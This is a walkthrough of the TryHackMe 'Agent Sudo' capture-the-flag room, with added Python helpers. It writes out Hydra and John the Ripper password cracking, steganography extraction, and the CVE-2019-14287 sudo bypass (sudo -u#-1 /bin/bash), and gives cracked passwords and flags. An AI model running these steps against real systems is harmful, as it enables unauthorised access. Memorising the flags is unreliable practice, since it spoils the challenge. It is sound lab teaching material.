Understanding Cybersecurity CTF: Agent Sudo
This Capture The Flag (CTF) challenge simulates a real-world cybersecurity scenario where you hack into a classified server hidden beneath the ocean. The goal is to uncover hidden information by performing enumeration, hash cracking, brute-force attacks, and privilege escalation—key techniques used in ethical hacking and penetration testing.
Agent Sudo is designed to test your ability to identify vulnerabilities, exploit weak credentials, and escalate privileges to gain full system control. Below is a structured walkthrough of the challenge, optimized for clarity and practical application.
Key Objectives
- Enumerate open ports, services, and hidden directories
- Crack hashes and brute-force passwords for FTP, ZIP files, and SSH
- Escalate privileges by exploiting system vulnerabilities
- Retrieve flags (user and root) to complete the challenge
Step-by-Step Walkthrough
1. Enumeration: Mapping the Target
Enumeration is the first step in any penetration test. It involves scanning the target to identify active services, open ports, and potential entry points.
Identifying Open Ports
Use nmap to scan for open ports and services:
nmap -sV -Pn -O -p- 10.10.209.115
Scan Results:
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 7.6p1 Ubuntu |
| 80 | HTTP | Apache httpd 2.4.29 (Ubuntu) |
Note: The scan reveals three open ports: FTP (21), SSH (22), and HTTP (80). Port 80 is a common entry point for web-based attacks.
Discovering Hidden Directories
Use Gobuster to brute-force hidden directories on the web server:
gobuster dir --url http://10.10.209.115 --wordlist /usr/share/wordlists/dirb/common.txt
Key Findings:
- /.htpasswd
- /.hta
- /.htaccess
- /index.php
- /server-status
Visiting http://10.10.209.115/index.php displays a message:
Dear agents, Use your own codename as user-agent to access the site. From, Agent R
Finding the Agent Codename
The message says the site checks the User-Agent header for an agent's codename. Sending single-letter codenames as the User-Agent (A, B, C, ...) and following redirects with -L shows that C is the one Agent R was addressing:
curl -A "C" -L 10.10.209.115
Response:
Attention chris, Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! From, Agent R
Key Takeaway: The agent's username is chris.
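The codename probe above was done by hand, one letter at a time. Here it is as a small script, added here as an example and not part of the original walkthrough. It sends each candidate codename as the User-Agent, refuses to follow redirects so the 302 itself is visible, and reports any codename whose response differs from a baseline browser User-Agent. The target URL, the baseline User-Agent string and the fake responder in the usage note are assumptions.

```python
"""User-Agent codename probe (added example, not from the original walkthrough).

Assumptions: the lab URL in __main__ is the walkthrough's IP; the baseline
User-Agent is an arbitrary non-codename string.
"""
import string
import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx responses so the redirect itself is observable."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status(url, user_agent, timeout=5):
    """GET url with the given User-Agent; return (status, Location header or None)."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With NoRedirect installed, a 302 surfaces here as an HTTPError.
        return err.code, err.headers.get("Location")


def probe_codenames(url, codenames, fetch=fetch_status, baseline_ua="Mozilla/5.0"):
    """Return (codename, status, location) for every codename whose response
    differs from the baseline User-Agent. `fetch` is injectable so the logic
    can be exercised offline against a constructed responder."""
    baseline = fetch(url, baseline_ua)
    hits = []
    for name in codenames:
        status, location = fetch(url, name)
        if (status, location) != baseline:
            hits.append((name, status, location))
    return hits


if __name__ == "__main__":
    # Live run against the walkthrough's target (assumed reachable).
    for hit in probe_codenames("http://10.10.209.115/", string.ascii_uppercase):
        print("User-Agent %s -> HTTP %s, Location: %s" % hit)
```

Checking the raw status and Location instead of the followed page is what makes a single redirect stand out among 26 otherwise identical 200 responses; the same loop works for longer codename wordlists.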
2. Hash Cracking and Brute-Force Attacks
With the username chris identified, and Agent R's note that his password is weak, the next step is to brute-force his FTP credentials.
Brute-Forcing FTP Password
Use Hydra to crack the FTP password:
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.209.115 ftp -I -V
Result:
[21][ftp] host: 10.10.209.115 login: chris password: crystal
Credentials:
chris:crystal
Downloading and Extracting Files
Connect to FTP and download the available files:
- cute-alien.jpg
- cutie.png
Use binwalk to extract hidden data from cutie.png:
binwalk -e cutie.png
binwalk carves an embedded, password-protected ZIP file (8702.zip) into the _cutie.png.extracted/ directory.
Cracking the ZIP File Password
Use John the Ripper to crack the ZIP password:
zip2john 8702.zip > zip_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt
Result: Password is alien.
Extracting Hidden Messages
Inside the ZIP file, a text file contains a base64-encoded string:
echo "QXJlYTUx" | base64 --decode
Output: Area51
The decoded string, Area51, is the passphrase for the data steghide embedded in cute-alien.jpg:
steghide extract -sf cute-alien.jpg -p Area51
Extracted Message:
Hi james, Glad you find this message. Your login password is hackerrules! Don’t ask me why the password looks cheesy, ask agent R who set this password for you. Your buddy, chris
Key Takeaways:
- Second agent's username: james
- SSH password: hackerrules!
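The binwalk and base64 steps above can be reproduced without the tools, which is useful for understanding what binwalk -e actually did to cutie.png: it looked for a ZIP local-file signature after the end of the PNG data and carved everything from that offset out. The script below is an added example, not code from the original walkthrough. It builds a constructed stand-in for cutie.png (a minimal 1x1 PNG with a ZIP appended), carves the ZIP by walking the PNG chunks to IEND first, and then picks out base64 tokens from the text file inside. The file name message.txt and the sentence around the QXJlYTUx token are assumptions.

```python
"""Carve an appended ZIP out of a PNG and decode base64 tokens from its text.

Added example, not the room's files: the PNG and ZIP are constructed here,
and 'message.txt' is an assumed file name.
"""
import base64
import binascii
import io
import struct
import zipfile
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def png_end_offset(data):
    """Walk PNG chunks and return the offset just past IEND.

    Searching only after the real image ends avoids false hits on a
    'PK' byte pattern that happens to occur inside compressed IDAT data.
    """
    if not data.startswith(PNG_MAGIC):
        raise ValueError("not a PNG")
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        pos += 8 + length + 4  # length/type header + payload + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("PNG has no IEND chunk")


def carve_zip(data):
    """Return (offset, zip_bytes) for a ZIP appended after the PNG, or None."""
    offset = data.find(ZIP_LOCAL_HEADER, png_end_offset(data))
    if offset == -1:
        return None
    return offset, data[offset:]


def base64_tokens(text):
    """Return (token, decoded) for whitespace-separated tokens that decode to
    printable ASCII; ordinary English words fail the decode or print check."""
    found = []
    for raw in text.split():
        token = raw.strip("'\".,")
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if decoded and decoded.isprintable():
            found.append((token, decoded))
    return found


def build_sample():
    """Constructed 1x1 greyscale PNG with a ZIP appended, mimicking cutie.png."""
    def chunk(ctype, payload):
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")  # one filter byte + one pixel
    png = PNG_MAGIC + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Constructed text; only the base64 token matches the walkthrough.
        zf.writestr("message.txt", "Send the picture to 'QXJlYTUx' as soon as possible.")
    return png + buf.getvalue()


def extract_messages(image_bytes):
    """Carve the ZIP, read each .txt inside, return decoded base64 tokens per file."""
    carved = carve_zip(image_bytes)
    if carved is None:
        return {}
    _, zip_bytes = carved
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".txt"):
                results[name] = base64_tokens(zf.read(name).decode("utf-8", "replace"))
    return results


if __name__ == "__main__":
    sample = build_sample()
    print("zip starts at offset", carve_zip(sample)[0])
    print(extract_messages(sample))
```

The real 8702.zip is password-protected, so on the actual file the zipfile read would need the password recovered with zip2john and john (zipfile.ZipFile.read accepts a pwd argument for the legacy ZipCrypto scheme). The sample here is unencrypted so the carving and decoding logic can run stand-alone.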
3. Gaining Access via SSH
With the credentials james:hackerrules!, connect to the server via SSH:
ssh james@10.10.209.115
Retrieving the User Flag
The user flag is located in james's home directory:
cat user_flag.txt
Flag: b03d975e8c92a7c04146cfa7a5a313c7
Investigating the Alien Photo
james's home directory also holds a photo, Alien_autospy.jpg. Copy it off the box and identify it (a reverse image search works); it is from a famous incident.
Answer:
Roswell alien autopsy
4. Privilege Escalation: Gaining Root Access
Privilege escalation turns the foothold as a low-privileged user into root (administrator) access, usually by exploiting a vulnerability or misconfiguration on the host.
Checking Sudo Permissions
Run sudo -l to check james's sudo privileges:
sudo -l
Output:
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
Vulnerability: The !root restriction can be bypassed with CVE-2019-14287, a flaw in sudo versions before 1.8.28. When a sudoers rule lets a user run a command as ALL users except root, asking for user ID -1 (or its unsigned form, 4294967295) slips past the exclusion: -1 never matches root's uid 0, and setresuid(-1) leaves the process uid unchanged, which at that point is already 0 because sudo itself runs as root. Confirm the installed sudo is older than 1.8.28 before relying on it.
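A quick triage script for this condition, added here as an example and not part of the original walkthrough: it parses the output of sudo -l for rules of the (ALL, !root) shape and compares the sudo version against 1.8.28, the first fixed release. The sample outputs are constructed to match what the page shows for james; the sudo -V version line is an assumption about the target.

```python
"""Triage for CVE-2019-14287 from `sudo -l` and `sudo -V` output.

Added example, not part of the walkthrough. SAMPLE_SUDO_L mirrors the
walkthrough's sudo -l output; SAMPLE_SUDO_V is an assumed version line.
"""
import re
import subprocess

# Constructed sample output, shaped like the page's sudo -l result.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""
# Constructed first line of `sudo -V`; the real box's version is not on the page.
SAMPLE_SUDO_V = "Sudo version 1.8.21p2\n"

FIXED_VERSION = (1, 8, 28)  # CVE-2019-14287 is fixed from 1.8.28 onward
# A sudo -l rule line: "(runas spec) command", e.g. "(ALL, !root) /bin/bash".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+?)\s*$")


def parse_version(sudo_v_output):
    """Return (major, minor, patch) from the 'Sudo version X.Y.Z' line."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("no sudo version line found")
    return tuple(int(x) for x in m.groups())


def parse_rules(sudo_l_output):
    """Return [(runas_users, command)] for every rule line in sudo -l output.

    The runas spec may be 'users : groups'; only the user part matters here.
    """
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
            rules.append((users, m.group(2)))
    return rules


def exposed_rules(rules):
    """Rules that allow ALL users but exclude root: the shape the bug bypasses."""
    return [
        (users, cmd)
        for users, cmd in rules
        if "ALL" in users and ("!root" in users or "!#0" in users)
    ]


def assess(sudo_l_output, sudo_v_output):
    """Combine version and rule checks into one verdict."""
    version = parse_version(sudo_v_output)
    hits = exposed_rules(parse_rules(sudo_l_output))
    return {
        "version": version,
        "exposed": hits,
        "vulnerable": version < FIXED_VERSION and bool(hits),
    }


if __name__ == "__main__":
    # Live run on the current host (sudo -l may prompt for the user's password).
    sudo_l = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout
    sudo_v = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    print(assess(sudo_l or SAMPLE_SUDO_L, sudo_v or SAMPLE_SUDO_V))
```

The version comparison is the part worth keeping: a (ALL, !root) rule on a patched sudo is still a misconfiguration worth reporting, but the -u#-1 trick will simply be rejected there.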
Exploiting CVE-2019-14287
Run the following command to escalate privileges:
sudo -u#-1 /bin/bash
This drops you into a root shell. Retrieve the root flag:
cat /root/root.txt
Root Flag:
To Mr. hacker, Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. Your flag is b53a02f55b57d4439e3341834d70c062 By, DesKel a.k.a Agent R
Bonus Answer: Agent R's real name is DesKel.
Lessons Learned
- Enumeration is critical: Always scan for open ports, services, and hidden directories.
- Weak passwords are a liability: brute-force tools like Hydra and John the Ripper crack weak credentials quickly.
- Privilege escalation requires research: exploiting known CVEs (e.g., CVE-2019-14287) can grant root access.
- Steganography hides data: tools like steghide and binwalk can extract hidden messages from files.
Learn More
To deepen your cybersecurity skills, explore these resources:
- TryHackMe: Hands-on CTF challenges and learning paths.
- Hack The Box: Real-world penetration testing labs.
- Exploit-DB: Database of known vulnerabilities and exploits.
- OWASP Testing Guide: Best practices for web security testing.